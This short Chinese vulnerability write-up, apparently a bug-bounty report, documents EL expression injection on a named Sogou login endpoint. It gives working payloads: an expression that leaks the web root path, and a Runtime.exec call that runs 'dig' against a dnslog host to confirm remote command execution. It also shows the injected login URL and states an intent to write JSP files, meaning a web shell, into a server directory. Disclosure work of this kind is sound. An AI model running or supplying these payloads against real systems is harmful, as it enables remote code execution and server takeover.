#1 漏洞地址
#2 表达式执行后的结果返回在页面
获取web路径
${pageContext.getSession().getServletContext().getClassLoader().getResource("")}
file:/opt/local/resin/
EL表达式参考
http://www.cnblogs.com/xdp-gacl/p/3938361.html
利用方式1
#3 执行命令
${pageContext.request.getSession().setAttribute("a",pageContext.request.getClass().forName("java.lang.Runtime").getMethod("getRuntime",null).invoke(null,null).exec("dig sougou.99fd5e.dnslog.info",null).getInputStream())}
CloudEYE:
读取 ${sessionScope}, 获取a=InputStream的回显内容,a=java.io.BufferedInputStream@4d778271
获取WebROOT
https://auth.p4p.sogou.com/login?service=${applicationScope}
然后就用命令向这个目录/opt/app/eunomia/ 写jsp文件了